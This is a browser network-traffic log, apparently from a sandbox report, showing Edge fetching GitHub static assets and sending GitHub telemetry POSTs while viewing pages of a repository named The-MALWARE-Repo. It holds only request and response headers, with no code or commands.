etag: "0x8DD60C7345C819E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 19670
x-served-by: cache-iad-kjyo7100154-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 50, 14
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9c4de66bb0a73acb7166285ae6d8c446328043db
content-length: 98925
GET

https://github.githubassets.com/assets/ui_packages_commits_components_Commits_CommitActionBar_tsx.73968ade99940a102d47.module.css

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_commits_components_Commits_CommitActionBar_tsx.73968ade99940a102d47.module.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: text/css
last-modified: Mon, 16 Dec 2024 22:03:10 GMT
etag: "0x8DD1E1D6DD44D8B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 2972595
x-served-by: cache-iad-kcgs7200095-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 44, 72
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e6f8bfc563c25773a4444d39eff3ebd85817f248
content-length: 153
GET

https://github.githubassets.com/assets/chunk-ui_packages_commits_components_Commits_CommitActionBar_tsx-02aa91c41168.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-ui_packages_commits_components_Commits_CommitActionBar_tsx-02aa91c41168.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 21:20:51 GMT
etag: "0x8DD4BAB20A78C57"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
age: 1183969
x-served-by: cache-iad-kjyo7100130-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 15359, 71
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f8caf2bde4879ad7891684beca4dee5c9f125152
content-length: 870
GET

https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_catalyst_lib_index_-280e4f-f7d6cfa05e86.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_catalyst_lib_index_-280e4f-f7d6cfa05e86.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 15:42:50 GMT
etag: "0x8DD4B7BE800038F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:40 GMT
age: 2356900
x-served-by: cache-iad-kjyo7100034-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 116, 2654
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e5de1489495ef0619015e55c3c3ff207cf771d5a
content-length: 3524
GET

https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_github_hydro--09cdca-c8338d3c4dc8.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_github_hydro--09cdca-c8338d3c4dc8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 15:42:50 GMT
etag: "0x8DD4B7BE7F340A6"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:40 GMT
age: 2356900
x-served-by: cache-iad-kiad7000105-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 97, 3624
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a743530637ab1f45d4a849f21f0010c81f10f171
content-length: 6136
GET

https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-b8c0ea-90d580abff98.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-b8c0ea-90d580abff98.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 24 Feb 2025 18:43:20 GMT
etag: "0x8DD55031C6A2C0C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:40 GMT
age: 1297470
x-served-by: cache-iad-kjyo7100113-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 68, 3348
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 82d9b590c9253392ec2c01ab7ef254ed16dd0f53
content-length: 6918
GET

https://github.githubassets.com/assets/diffs-76da528a8b4c.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/diffs-76da528a8b4c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 05 Mar 2025 20:19:54 GMT
etag: "0x8DD5C2317CB1C2E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:40 GMT
age: 521329
x-served-by: cache-iad-kcgs7200025-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 68, 1678
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 678f4374f08dfc86e4c0127e5b68a0dbf7141274
content-length: 19779
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 999
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:35:06 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002960
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:2373BB:307473:67D0F2D9
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 2742
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:35:06 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002814
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:2373BC:307476:67D0F2DA
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 2489
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:35:08 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002462
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:23781F:307A2E:67D0F2DA
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 2627
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:35:08 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002163
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:23784D:307A71:67D0F2DC
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1072
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:35:10 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002991
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:237ABB:307DAF:67D0F2DC
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1150
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:35:12 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003618
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:237EDE:308354:67D0F2DE
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 2628
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:35:22 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003586
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:238E24:3097D5:67D0F2E0
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1141
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:35:48 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002080
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:23B8B9:30D1BB:67D0F2EA
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1087
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:35:50 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002616
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:23BBD7:30D610:67D0F304
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 2950
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:35:51 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.003295
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:23BCF1:30D77F:67D0F306
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1171
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:36:31 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002996
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:23FC87:312DC2:67D0F307
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1236
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:36:31 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002504
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:23FC89:312DC4:67D0F32F
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1088
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:36:32 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002883
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: 99B7:4AF94:23FE07:312FDF:67D0F32F
POST

https://collector.github.com/github/collect

msedge.exe

Remote address:

140.82.113.22:443

Request

POST /github/collect HTTP/2.0
host: collector.github.com
content-length: 3225
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 204

date: Wed, 12 Mar 2025 02:36:32 GMT
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
